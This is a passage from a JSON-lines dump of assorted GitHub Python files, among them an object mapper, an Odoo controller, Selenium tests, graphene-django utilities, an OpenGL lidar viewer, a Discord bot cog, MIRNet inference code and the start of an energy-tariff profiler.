+{"seq_id":"39801771456","text":"import inspect\nfrom dataclasses import dataclass, field\nfrom enum import Enum\nfrom typing import TypeVar, Type, Callable, Dict, Any, List, Tuple\n\nfrom py_object_mapper import inspection\n\n_FT = TypeVar('_FT')\n_TT = TypeVar('_TT')\n\n\n@dataclass\nclass Mapper:\n\n    NONE_TYPE: Type[_TT] = type(None)\n    primitive_types = [int, str, bool]\n    mappings: Dict[Type[_FT], Tuple[Type[_TT], Dict[str, Callable]]] = field(default_factory=dict)\n\n    def add_map(self, from_type: Type[_FT], to_type: Type[_TT], custom_mapping: Dict[str, Callable]):\n        if custom_mapping is None:\n            custom_mapping = {}\n        self.mappings[from_type] = (to_type, custom_mapping)\n\n    def map(self, from_obj: _FT, to_type: Type[_TT]) -> _TT:\n        if to_type is self.NONE_TYPE:\n            if type(from_obj) not in self.mappings:\n                return None\n            to_type = self.mappings[type(from_obj)][0]\n\n        return to_type(**(\n            self.__copy_params_form(from_obj, inspection.mandatory_params(to_type)) |\n            self.__copy_params_form(from_obj, inspection.optional_params(to_type))\n        ))\n\n    def __copy_params_form(\n            self,\n            from_obj: _FT,\n            param_infos: List[Tuple[str, inspect.Parameter]]) -> Dict[str, Any]:\n        result = {}\n        custom_mapping = self.mappings[type(from_obj)][1]\n        from_prop = vars(from_obj)\n        for param_info in param_infos:\n            prop, parameter = param_info\n            value_of_from = from_prop.get(prop)\n\n            if prop in custom_mapping:\n                value_of_from = custom_mapping[prop](from_obj)\n            elif isinstance(parameter.annotation, type(Enum)):\n                value_of_from = getattr(parameter.annotation, value_of_from.upper())\n            elif value_of_from is None:\n                value_of_from = parameter.default\n            elif type(value_of_from) not in self.primitive_types:\n                if isinstance(value_of_from, list):\n                    value_of_from = self.__mapper_list(value_of_from)\n                elif isinstance(value_of_from, dict):\n                    value_of_from = self.__mapper_dict(value_of_from) or value_of_from\n                else:\n                    value_of_from = self.map(value_of_from, self.NONE_TYPE)\n            result[prop] = value_of_from\n        return result\n\n    def __mapper_dict(self, value_of_from) -> Dict[str, _TT]:\n        result: Dict[str, _TT] = {}\n        for key, val in value_of_from.items():\n            if type(val) in self.mappings:\n                to_model = self.map(val, self.NONE_TYPE)\n                result[key] = to_model\n        return result\n\n    def __mapper_list(self, value_of_from) -> List[_TT]:\n        result: List[_TT] = []\n        for item in 
value_of_from:\n            if type(item) in self.primitive_types:\n                result.append(item)\n            else:\n                result.append(self.map(item, self.NONE_TYPE))\n        return result\n\n\nmapper = Mapper()\n\n\ndef map_obj(from_obj: _FT, to_type: Type[_TT]) -> _TT:\n    return mapper.map(from_obj, to_type)\n\n\ndef register_map(from_type: Type[_FT], to_type: Type[_TT], custom_mapping: Dict[str, Callable[[_FT], Any]] = None):\n    return mapper.add_map(from_type, to_type, custom_mapping)\n","repo_name":"weijiany/py-object-mapper","sub_path":"py_object_mapper/mapper.py","file_name":"mapper.py","file_ext":"py","file_size_in_byte":3260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"10704028007","text":"from odoo import http\nfrom odoo.addons.portal.controllers.portal import CustomerPortal, pager\n\n\nclass MyShopController(CustomerPortal):\n\n    def _prepare_home_portal_values(self, counters):\n        counts = super(MyShopController, self)._prepare_home_portal_values(counters)\n        counts['item_counts'] = http.request.env['sulpak.smartphone'].search_count([])\n        return counts\n\n    @http.route(['/sulpak/smartphones', '/sulpak/smartphones/page/<int:page>'], type='http', website=True, auth='public')\n    def shop_items_list_view(self, page=1, **kwargs):\n        item_obj = http.request.env['sulpak.smartphone']\n        items_total = item_obj.search_count([])\n        page_detail = pager(url='/sulpak/smartphones',\n                            total=items_total,\n                            page=page,\n                            step=5)\n        items = item_obj.search([], limit=5, offset=page_detail['offset'])\n        context = {'items': items,\n                   'page_name': 'items_list',\n                   'pager': page_detail}\n        return http.request.render('om_sulpak.shop_items_list', context)\n","repo_name":"Geroigazy/odoo","sub_path":"custom_addons/om_sulpak/controllers/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"10144914327","text":"#1 - Variables\r\nnombre = \"juan\"\r\nprint(nombre)\r\n\r\nnombre = \"laura\"\r\nprint (nombre)\r\n\r\n#2 - suma de variables\r\nedad = 10\r\nedad2 = 15\r\nprint(edad + edad2)\r\n\r\n#3 - Pedir Caracter\r\nnombre = input(\"dime tu nombre: \")\r\nprint(\"tu nombre es: \" + nombre)\r\n\r\n#4 - Concatenar variables\r\nnombre = \"hola \"\r\nnombre2 = \"phyton\"\r\nfrase = nombre + nombre2\r\nprint(frase)","repo_name":"SantiagoUGC07/Curso_Python","sub_path":"PRACT_2/2_Variables.py","file_name":"2_Variables.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"36819166770","text":"import unittest\nfrom tests.base_test import BaseTest\nfrom pages.home_page import HomePage\nfrom pages.results_page import ResultsPage\n# import random\nfrom ddt import ddt, data, unpack\nimport csv\n\n\ndef get_data(file_name):\n    open('/home/tester/PycharmProjects/BotlandProjectPOP/tests/products.csv')\n    slowa = []\n    data_file = open(file_name, 'rt')\n    reader = csv.reader(data_file)\n    next(reader, 1)\n    for row in reader:\n        slowa.append(row)\n        print(row)\n    return slowa\n\n@ddt\nclass ResultsTests(BaseTest):\n    @data(*get_data(\"/home/tester/PycharmProjects/BotlandProjectPOP/tests/products.csv\"))\n    @unpack\n    def testProductSearch(self, products):\n        hp = HomePage(self.driver)\n        rp = ResultsPage(self.driver)\n        rp.search_product(products)\n\n    #test z elementem losowości: losuje 1 wartość z listy poniżej i wyszukuje w sklepie:\n        # rp.search_product(\n        #     (random.choice([\"Drony\", \"Java 
Script\", \"Java\", \"Roboty\", \"Raspberry\"])))\n\n rp.search_product2()\n rp.search_product_results()\n rp.submit_results()\n rp.product_sorting()\n rp.choose_products()\n rp.close_cookies()\n rp.order_click()\n rp.verify_site_order()\n\n rp.sum_of_products()\n suma = rp.sum_of_products()\n zam2 = rp.client_order()\n self.assertEqual(suma, zam2, \"Ceny nie są zgodne.\")\n rp.clear_basket()\n\n\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)\n","repo_name":"OneHandedTester/New_project_CDV","sub_path":"tests/results_page_test.py","file_name":"results_page_test.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72655842753","text":"import re\nfrom collections import OrderedDict\n\nfrom django import VERSION as DJANGO_VERSION\nfrom django.apps import apps\nfrom django.contrib.contenttypes.fields import GenericForeignKey, GenericRel\nfrom django.core.exceptions import ValidationError\nfrom django.db.models import NOT_PROVIDED, QuerySet, Manager, Prefetch\nfrom django.db.models.base import ModelBase\nfrom graphene.utils.str_converters import to_snake_case\nfrom graphene_django.utils import is_valid_django_model, get_reverse_fields\nfrom graphene_django.registry import get_global_registry\nfrom graphql import GraphQLList, GraphQLNonNull\nfrom graphql.language.ast import FragmentSpread\nfrom rest_framework.compat import _resolve_model\nfrom six import string_types\nfrom graphene_django_extras.utils import _get_queryset, get_related_fields\n\n\ndef get_prefetched_attr_name(field_name):\n \"\"\" Get the name of the attribute where a prefetched result will be stored \"\"\"\n return \"_prefetched_{}\".format(field_name)\n\n\ndef get_prefetched_attr(root, field_name, default=None):\n \"\"\" Get the prefetched value corresponding to the given field name (if it exists) \"\"\"\n return getattr(root, get_prefetched_attr_name(field_name), default)\n\n\ndef get_node_field(root_field, node_name):\n attr_node = getattr(root_field, node_name, None)\n if attr_node:\n return attr_node.type.of_type\n wrapper = root_field._meta.fields[node_name].type().type\n if hasattr(wrapper, '_meta'):\n return wrapper\n return wrapper.of_type\n\n\ndef recursive_optimize(root_field, selection_set, fragments, available_related_fields, select_related, prefetch_related, prefixes=[]):\n has_sub_nodes = False\n for field in selection_set.selections:\n temp = available_related_fields.get(\n field.name.value,\n available_related_fields.get(\n to_snake_case(field.name.value),\n None)\n )\n if temp and getattr(field, 'selection_set', None):\n has_sub_nodes = True\n if (temp.many_to_many or temp.one_to_many):\n related_field = getattr(root_field, temp.name)\n kwargs = dict([to_snake_case(i.name.value), i.value.value]\n for i in field.arguments)\n queryset = related_field.get_queryset(\n root_field, temp.name, [field], fragments, **kwargs)\n field_prefetch = Prefetch(\n temp.name, to_attr=get_prefetched_attr_name(temp.name), queryset=queryset)\n prefetch_related.append(field_prefetch)\n else:\n sub_node = get_node_field(root_field, temp.name)\n sub_prefixes = prefixes + [to_snake_case(temp.name)]\n recursive_optimize(\n sub_node,\n field.selection_set,\n fragments,\n get_related_fields(temp.related_model),\n select_related,\n prefetch_related,\n sub_prefixes\n )\n\n if not has_sub_nodes and prefixes:\n select_related.append(\"__\".join(prefixes))\n\n\ndef queryset_factory(root_field, fields_asts=None, fragments=None, 
**kwargs):\n manager = root_field._meta.model.objects\n select_related = []\n prefetch_related = []\n available_related_fields = get_related_fields(root_field._meta.model)\n\n for f in kwargs.keys():\n temp = available_related_fields.get(f.split('_', 1)[0], None)\n if temp:\n if (temp.many_to_many or temp.one_to_many) and \\\n temp.name not in prefetch_related:\n prefetch_related.append(temp.name)\n else:\n select_related.append(temp.name)\n\n if fields_asts:\n recursive_optimize(\n root_field,\n fields_asts[0].selection_set,\n fragments,\n available_related_fields,\n select_related,\n prefetch_related\n )\n\n if select_related and prefetch_related:\n return _get_queryset(manager.select_related(\n *select_related).prefetch_related(*prefetch_related))\n elif not select_related and prefetch_related:\n return _get_queryset(manager.prefetch_related(*prefetch_related))\n elif select_related and not prefetch_related:\n return _get_queryset(manager.select_related(*select_related))\n return _get_queryset(manager)\n","repo_name":"grahammcculloch/optimised-pagination","sub_path":"test-site/graphql_util/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25176464795","text":"from subprocess import Popen, PIPE\nfrom plyer.facades import Processors\nfrom plyer.utils import whereis_exe\n\nfrom os import environ\n\n\nclass LinuxProcessors(Processors):\n def _get_state(self):\n old_lang = environ.get('LANG')\n environ['LANG'] = 'C'\n\n status = {\"Number_of_Processors\": None}\n\n dev = \"--all\"\n nproc_process = Popen(\n [\"nproc\", dev],\n stdout=PIPE\n )\n output = nproc_process.communicate()[0]\n\n environ['LANG'] = old_lang\n\n if not output:\n return status\n\n status['Number_of_Processors'] = output.rstrip()\n\n return status\n\n\ndef instance():\n import sys\n if whereis_exe('nproc'):\n return LinuxProcessors()\n sys.stderr.write(\"nproc not found.\")\n return Processors()\n","repo_name":"kivy/plyer","sub_path":"plyer/platforms/linux/processors.py","file_name":"processors.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":1476,"dataset":"github-code","pt":"61"} +{"seq_id":"31385294140","text":"# This is set up in such a way that you should not need to alter this file to\n# add an argument, in most cases. 
See em_args.py\n\nimport optparse\nimport em_args\nfrom epumgmt.api.actions import ACTIONS\n\n# Not using yet\nEC_VERSION = \"X.Y\"\n\n# -----------------------------------------------------------------------------\n\ndef _add_option(group, arg):\n    if arg.boolean:\n        _add_boolean_option(group, arg)\n    elif arg.string:\n        _add_string_option(group, arg)\n    else:\n        raise Exception(\"unknown arg type\")\n    \ndef _add_string_option(group, arg):\n    if arg.short_syntax:\n        group.add_option(arg.short_syntax, arg.long_syntax,\n                         dest=arg.dest, help=arg.help,\n                         metavar=arg.metavar)\n    else:\n        group.add_option(arg.long_syntax,\n                         dest=arg.dest, help=arg.help,\n                         metavar=arg.metavar)\n\ndef _add_boolean_option(group, arg):\n    if arg.short_syntax:\n        group.add_option(arg.short_syntax, arg.long_syntax,\n                         dest=arg.dest, help=arg.help,\n                         action=\"store_true\", default=False)\n    else:\n        group.add_option(arg.long_syntax,\n                         dest=arg.dest, help=arg.help,\n                         action=\"store_true\", default=False)\n\ndef parsersetup():\n    \"\"\"Return configured command-line parser.\"\"\"\n\n    ver=\"Nimbus EPU Management %s - http://www.nimbusproject.org\" % EC_VERSION\n    usage=\"epumgmt action [Arguments]\"\n    parser = optparse.OptionParser(version=ver, usage=usage)\n\n    # ---------------------------------------\n    \n    # Might be helpful to have more groups in the future.\n    actions = ACTIONS().all_actions()\n    deprecated_args = []\n    other_args = []\n    \n    for arg in em_args.ALL_EC_ARGS_LIST:\n        if arg.deprecated:\n            deprecated_args.append(arg)\n        else:\n            other_args.append(arg)\n    \n    \n    # ---------------------------------------\n    actions_title = \"  Actions\"\n    arguments_title = \"  Arguments\"\n    deprecated_title = \"  Deprecated\"\n    # For each one, use twice length of the longest one:\n    groupline = (len(2*deprecated_title)-1) * \"-\"\n\n\n    # Actions\n    actions_description = \", \".join(ACTIONS().all_actions())\n    group = optparse.OptionGroup(parser, actions_title, actions_description)\n    parser.add_option_group(group)\n\n    \n    # Arguments\n    group = optparse.OptionGroup(parser, arguments_title, groupline)\n    for arg in other_args:\n        _add_option(group, arg)\n    parser.add_option_group(group)\n\n    \n    # Deprecated Arguments\n    if len(deprecated_args) > 0:\n        group = optparse.OptionGroup(parser, deprecated_title, groupline)\n        for arg in deprecated_args:\n            _add_option(group, arg)\n        parser.add_option_group(group)\n    \n    return parser\n\ndef parse(argv):\n    \"\"\"parse arguments from the command line\n\n    The last positional argument will be considered the action.\n    \"\"\"\n\n    if not argv:\n        return None, None\n    parser = parsersetup()\n    opts, args = parser.parse_args(argv)\n    try:\n        opts.action = args.pop()\n    except IndexError:\n        # No action specified\n        pass\n\n    return opts, args\n\ndef print_help():\n    \"\"\"convenience function for printing help from other places in epumgmt\n    \"\"\"\n    parser = parsersetup()\n    parser.print_help()\n\ndef print_version():\n    \"\"\"convenience function for printing version from other places in epumgmt\n    \"\"\"\n    parser = parsersetup()\n    parser.print_version()\n","repo_name":"nimbusproject/epumgmt","sub_path":"src/python/epumgmt/main/em_optparse.py","file_name":"em_optparse.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"}
+{"seq_id":"21672963000","text":"import sys\nfrom OpenGL.GL import *\nfrom OpenGL.GLUT import *\nfrom OpenGL.GLU import *\nimport numpy as np\n\nimport serial\n\nw_size = 1000\nh_size = 1000\n\nser = serial.Serial(sys.argv[1], 
baudrate=115200)\nser.flush()\ncount = 0\n\nscale = 1.0 / 20\n\n\ndef reduce(distances, num_segments):\n global last_segment\n\n if 360 % num_segments != 0:\n raise Exception(\"360 must be divisible by num_segments\")\n\n step_size = int(360 / num_segments)\n segment = []\n for angle in range(0, 360, step_size):\n segment.append(int(np.mean(distances[angle : (angle + step_size)])))\n\n draw_segments(500, step_size, np.divide(segment, 10000))\n\n\navg_delta = 2\n\ndist = []\n\ndef read_data():\n global count\n global scale\n angle_adj = 0\n line = ser.readline().strip()\n # print(line)\n\n glBegin(GL_LINES)\n glColor3f(1.0, 0.0, 0.0)\n glVertex2f(w_size / 2 - 10, h_size / 2)\n glVertex2f(w_size / 2 + 10, h_size / 2)\n glVertex2f(w_size / 2, h_size / 2 - 10)\n glVertex2f(w_size / 2, h_size / 2 + 10)\n glEnd()\n\n raw_distances = []\n for angle in range(360):\n value = int(line[(angle * 4) : ((angle * 4) + 4)], 16)\n raw_distances.append(value)\n\n if int(len(line) / 4) == 360:\n dist.append(raw_distances)\n\n if len(dist) > avg_delta:\n del dist[0]\n\n distances = np.mean(dist, axis=0)\n reduce(np.abs(np.subtract(distances, raw_distances)), 180)\n\n glBegin(GL_POINTS)\n glColor3f(0.224, 1.0, .078)\n for angle in range(360):\n y = distances[angle] * scale * np.cos(np.deg2rad(angle + angle_adj))\n x = distances[angle] * scale * np.sin(np.deg2rad(angle + angle_adj))\n # print(w_size/2 + x, h_size/2 + y)\n glVertex2f(w_size / 2 + x, h_size / 2 + y)\n\n glEnd()\n\n # print(\"----------{}----------\".format(count))\n count += 1\n else:\n print(\"NOOOOOOO\")\n print(line)\n\n\ndef draw_segments(radius, step, colors=None):\n glBegin(GL_TRIANGLES)\n for angle in range(0, 360, step):\n if colors is None:\n glColor3f(\n 0.2 + (0.8 / (360 / step)) * (angle / step),\n 0.2 + (0.8 / (360 / step)) * (angle / step),\n 0.2 + (0.8 / (360 / step)) * (angle / step),\n )\n else:\n glColor3f(\n colors[int(angle / step)],\n colors[int(angle / step)],\n colors[int(angle / step)],\n )\n glVertex2f(w_size / 2, h_size / 2)\n glVertex2f(\n w_size / 2 + radius * np.sin(np.deg2rad(angle)),\n h_size / 2 + radius * np.cos(np.deg2rad(angle)),\n )\n glVertex2f(\n w_size / 2 + radius * np.sin(np.deg2rad(angle + step)),\n h_size / 2 + radius * np.cos(np.deg2rad(angle + step)),\n )\n glEnd()\n\n\ndef iterate():\n glViewport(0, 0, w_size, h_size)\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n glOrtho(0.0, w_size, 0.0, h_size, 0.0, 1.0)\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n\n\ndef showScreen():\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n glLoadIdentity()\n iterate()\n\n read_data()\n glutSwapBuffers()\n\n\nglutInit()\nglutInitDisplayMode(GLUT_RGBA)\nglutInitWindowSize(w_size, h_size)\nglutInitWindowPosition(0, 0)\nwind = glutCreateWindow(\"OpenGL Coding Practice\")\nglutDisplayFunc(showScreen)\nglutIdleFunc(showScreen)\nglutMainLoop()\n","repo_name":"alvarop/lidar","sub_path":"sw/gltest.py","file_name":"gltest.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27499618728","text":"import sys\n\nsys.stdin = open('input.txt')\n\ninput = sys.stdin.readline\nimport copy\n\nN = int(input())\narr = []\n\nfor _ in range(N):\n arr.append(int(input()))\ntmp = copy.deepcopy(arr)\n\nwhile True:\n minV = 101\n minI = []\n maxV = 0\n maxI = []\n for i in range(N):\n if arr[i] > maxV:\n maxI = []\n maxI.append(i)\n maxV = arr[i]\n elif arr[i] == maxV:\n maxI.append(i)\n\n if arr[i] < minV:\n minI = []\n 
minI.append(i)\n minV = arr[i]\n elif arr[i] == minV:\n minI.append(i)\n\n if maxV - minV > 17:\n if len(maxI) > len(minI):\n for i in minI:\n arr[i] += 1\n else:\n for i in maxI:\n arr[i] -= 1\n else:\n break\n\nans = 0\nfor i in range(N):\n if tmp[i] != arr[i]:\n ans += (tmp[i] - arr[i])**2\nprint(tmp)\nprint(arr)\nprint(ans)\n","repo_name":"khjeon5328/today_algorithm","sub_path":"2021/2021.06월/7일/9881.py","file_name":"9881.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13167887842","text":"from src.utils.checks import *\nfrom src.tools.BotTools import *\nfrom discord.ext import commands\nimport logging,asyncio\nimport discord\nimport os\nimport typing\nfrom random import choice\nfrom src.tools.Translator import *\nfrom src.utils.config import *\n\nclass NSFW(commands.Cog):\n def __init__(self,bot,logger):\n self.bot = bot\n self.logger = logger\n\n @commands.cooldown(5,30,commands.BucketType.channel)\n @commands.cooldown(1,5,commands.BucketType.user)\n @commands.is_nsfw()\n @commands.command()\n async def nsfwjoke(self,ctx,lang: typing.Optional[str] = \"FR\"):\n \"\"\"**NSFW channel required**\n Display a NSFW joke (only in french currently)\"\"\"\n if lang in [\"FR\", \"EN\"]:\n with open(\"{}/nsfw-{}.txt\".format(Config()[\"directories\"][\"jokes\"], lang),encoding=\"utf-8\") as f:\n jokelist = f.readlines()\n if len(jokelist) > 0:\n await ctx.message.channel.send(choice(jokelist).replace(\"\\\\n\",\"\\n\"))\n else:\n data = GenericCommandParameters(ctx)\n await ctx.message.channel.send(data.lang[\"nojoke\"].format(lang))\n else:\n data = GenericCommandParameters(ctx)\n await ctx.message.channel.send(data.lang[\"nojoke\"].format(lang))\n\n @commands.cooldown(5,30,commands.BucketType.channel)\n @commands.cooldown(3,5,commands.BucketType.user)\n @commands.is_nsfw()\n @commands.command()\n async def hentai(self,ctx):\n \"\"\"**NSFW channel required**\n Display a random hentai pic :smirk:\"\"\"\n with open(\"Hentai/{}\".format(choice(os.listdir(\"Hentai\"))),\"rb\") as f:\n await ctx.message.channel.send(file=discord.File(f))\n\n @commands.cooldown(1,30,commands.BucketType.channel)\n @commands.is_nsfw()\n @commands.command()\n async def rule34(self,ctx):\n \"\"\"**NSFW channel required**\n Do you really need some further explanations ?\"\"\"\n await ctx.message.channel.send(\"Rule 34 : *If it exists, there is porn on it*\\nhttps://rule34.paheal.net/\")\n","repo_name":"ttgc/TtgcBot","sub_path":"src/cogs/NSFW.py","file_name":"NSFW.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"9875578010","text":"import os\r\nimport numpy as np\r\nfrom PIL import Image\r\nfrom keras import utils\r\nfrom keras.models import load_model\r\nfrom mirnet import *\r\nfrom train import charbonnier_loss, peak_signal_noise_ratio\r\n \r\n\r\nMODEL_DIR = \"./checkpoints\"\r\n\r\n\r\ndef infer(model, original_image):\r\n image = utils.img_to_array(original_image)\r\n image = image.astype(\"float32\") / 255.0\r\n image = np.expand_dims(image, axis=0)\r\n output = model.predict(image)\r\n output_image = output[0] * 255.0\r\n output_image = output_image.clip(0, 255)\r\n output_image = output_image.reshape(\r\n (np.shape(output_image)[0], np.shape(output_image)[1], 3)\r\n )\r\n output_image = Image.fromarray(np.uint8(output_image))\r\n original_image = Image.fromarray(np.uint8(original_image))\r\n return 
output_image\r\n\r\n\r\nif __name__ == \"__main__\":\r\n \r\n model_path = os.listdir(MODEL_DIR)[0]\r\n model_path = f\"{MODEL_DIR}/{model_path}\"\r\n\r\n model = load_model(\r\n model_path, custom_objects={\r\n \"selective_kernel_feature_fusion\": selective_kernel_feature_fusion,\r\n \"spatial_attention_block\": spatial_attention_block, \r\n \"channel_attention_block\": channel_attention_block, \r\n \"dual_attention_unit_block\": dual_attention_unit_block, \r\n \"down_sampling_module\": down_sampling_module, \r\n \"up_sampling_module\": up_sampling_module, \r\n \"multi_scale_residual_block\": multi_scale_residual_block, \r\n \"recursive_residual_group\": recursive_residual_group,\r\n \"charbonnier_loss\": charbonnier_loss,\r\n \"peak_signal_noise_ratio\": peak_signal_noise_ratio,\r\n },\r\n )\r\n\r\n print(f\"\\nModel loaded: {model_path}\\n\")\r\n\r\n while True:\r\n image_path = input(\"Please enter an image path >> \")\r\n \r\n if image_path == \"exit\" or image_path == \"stop\" or image_path == \"break\":\r\n print(\"\\n[Exiting the programme...]\\n\")\r\n break\r\n\r\n save_path = input(\"Please enter a path for saving the result >> \")\r\n\r\n original_image = Image.open(image_path).convert(\"RGB\")\r\n\r\n width, height = original_image.size\r\n\r\n while True:\r\n if width % 8 != 0:\r\n width -= 1\r\n else:\r\n break\r\n\r\n while True:\r\n if height % 8 != 0:\r\n height -= 1\r\n else:\r\n break\r\n \r\n original_image = original_image.crop((0, 0, width, height))\r\n\r\n print(original_image.size)\r\n\r\n print(\"\\n[Infering...]\\n\")\r\n result = infer(model, original_image)\r\n\r\n result.save(save_path)\r\n print(f\"\\nDone. The result was saved to {save_path}.\\n\")\r\n\r\n","repo_name":"henryyantq/MIRNet-Keras","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44441158032","text":"# Configuration file for the Sphinx documentation builder.\n\nimport os\nimport sys\n\nsys.path.insert(0, os.path.abspath('..'))\n\nproject = 'LoanPy'\ncopyright = '2023, Viktor Martinović'\nauthor = 'Viktor Martinović'\nversion = '3.0'\nrelease = '3.0'\n\nhtml_theme = 'sphinx_rtd_theme'\nextensions = ['sphinx.ext.autodoc', 'sphinx_copybutton']\n\n# Links\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#general-configuration\n# https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output\n# https://www.sphinx-doc.org/en/master/usage/configuration.html\n# https://sphinx-copybutton.readthedocs.io/en/latest/index.html\n","repo_name":"LoanpyDataHub/loanpy","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"61"} +{"seq_id":"34453042772","text":"from BasePage import BasePage\nfrom BasePage import IncorrectPageException\nfrom oig.Constants import TT_Constants\nfrom oig.UIMap import FraudOtherFraudPageMap\n\n\n#this is a page object for the Fraud Alerts - Other Fraud Sites of Interest info page\n#accessed after clicking the Other Fraud Sites of Interest link \nclass FraudOtherFraudPage(BasePage):\n\n def __init__(self, driver):\n super(FraudOtherFraudPage, self).__init__(driver)\n \n def _verify_page(self):\n try:\n self.wait_for_element_visibility(10, \n \"xpath\", \n 
FraudOtherFraudPageMap['FraudOtherFraudBannerXpath']\n )\n except: \n raise IncorrectPageException\n \n \n \n ","repo_name":"vleung1/portfolio","sub_path":"Vincent_Leung_Portfolio_2016/test-automation/oig/pages/FraudOtherFraudPage.py","file_name":"FraudOtherFraudPage.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27893426725","text":"# -*- coding: utf-8 -*-\nfrom __future__ import division\n\nimport bisect\nimport logging\ntry:\n from collections import namedtuple, Counter\nexcept ImportError:\n from backport_collections import namedtuple, Counter\nfrom datetime import datetime, date, timedelta\nfrom multiprocessing import Lock\ntry:\n from StringIO import StringIO\nexcept ImportError:\n from io import StringIO\nfrom dateutil.relativedelta import relativedelta\nfrom decimal import Decimal\nfrom six import string_types\n\nfrom ..profiles import Dragger\nfrom ..contracts.tariff import Tariff, T30A_one_period, T31A_one_period, T31A\nfrom ..datetime.timezone import TIMEZONE\nfrom ..metering.measure import Measure, EnergyMeasure\nfrom ..datetime.solar_hour import convert_to_solar_hour\n\nfrom os import path\nfrom six import BytesIO\nimport pandas as pd\nimport bz2\nimport csv\nimport gzip\nimport requests\n\ntry:\n import httplib\nexcept ImportError:\n import http.client as httplib\n\n\nlogger = logging.getLogger(__name__)\n\n\nCOEFFS = ['A', 'B', 'C', 'D']\nEXTRA_COEFFS = ['2.0TD', '3.0TD', '3.0TDVE']\n\n\ndef get_tariff_coeffs_list(year, month):\n assert isinstance(year, int)\n assert isinstance(month, int)\n if (year >= 2021 and month >= 6) or year >= 2022: # temporal solution, till REE publish new coeffs for 2022\n return EXTRA_COEFFS\n else:\n return COEFFS\n\n\nclass Coefficent(namedtuple('Coefficient', ['hour', 'cof'])):\n __slots__ = ()\n\n def __lt__(self, other):\n return self.hour < other.hour\n\n def __le__(self, other):\n return self.hour <= other.hour\n\n def __gt__(self, other):\n return self.hour > other.hour\n\n def __ge__(self, other):\n return self.hour >= other.hour\n\n\nclass Coefficients(object):\n def __init__(self, coefs=None):\n if coefs is None:\n coefs = []\n assert isinstance(coefs, list)\n self.coefs = list(coefs)\n\n def _check_pos(self, pos):\n if pos == len(self.coefs):\n raise ValueError('start date not found in coefficients')\n\n def insert_coefs(self, coefs):\n pos_0 = bisect.bisect_left(self.coefs, Coefficent(coefs[0][0], {}))\n pos_1 = bisect.bisect_right(self.coefs, Coefficent(coefs[-1][0], {}))\n logger.debug('Deleting from {start}({pos_0}) to {end}({pos_1})'.format(\n start=coefs[0][0], end=coefs[-1][0], pos_0=pos_0, pos_1=pos_1\n ))\n del self.coefs[pos_0:pos_1]\n for c in reversed(coefs):\n logger.debug('Inserting {c} into {pos_0}'.format(\n c=c, pos_0=pos_0\n ))\n self.coefs.insert(pos_0, c)\n\n def get(self, dt):\n assert isinstance(dt, datetime)\n if dt.dst() is None:\n dt = TIMEZONE.localize(dt)\n dt = TIMEZONE.normalize(dt)\n pos = bisect.bisect_left(self.coefs, Coefficent(dt, {}))\n self._check_pos(pos)\n return self.coefs[pos]\n\n def get_range(self, start, end):\n assert isinstance(start, date)\n assert isinstance(end, date)\n start = TIMEZONE.localize(datetime(\n start.year, start.month, start.day, 1), is_dst=True\n )\n # Sum one day to get the hour 00:00 of the next day\n end += timedelta(days=1)\n end = TIMEZONE.localize(datetime(\n end.year, end.month, end.day), is_dst=True\n ) + timedelta(seconds=1)\n pos = 
bisect.bisect_left(self.coefs, Coefficent(start, {}))\n        self._check_pos(pos)\n        end_pos = bisect.bisect_right(self.coefs, Coefficent(end, {}))\n        return self.coefs[pos:end_pos]\n\n    def get_coefs_by_tariff(self, tariff, start, end):\n        assert hasattr(tariff, 'get_period_by_date')\n        assert hasattr(tariff, 'energy_periods')\n        assert isinstance(start, date)\n        assert isinstance(end, date)\n        sum_cofs = dict.fromkeys(tariff.energy_periods.keys(), 0)\n        for hour, coef in self.get_range(start, end):\n            if len(sum_cofs) > 1:\n                dt = hour - timedelta(minutes=1)\n                period = tariff.get_period_by_date(dt)\n                p_name = period.code\n            else:\n                p_name = list(sum_cofs.keys())[0]\n            sum_cofs[p_name] += coef[tariff.cof]\n        return sum_cofs\n\n\nclass Profiler(object):\n    def __init__(self, coefficient):\n        self.coefficient = coefficient\n\n    def profile(self, tariff, measures, drag_method='hour'):\n        \"\"\"\n        :param tariff:\n        :param measures:\n        :param drag_method: 'hour' means drag is passed to the next hour\n                            'period' means drag is passed to the next hour for\n                            the same period\n        :return:\n        \"\"\"\n        # {'PX': [(date(XXXX-XX-XX), 100), 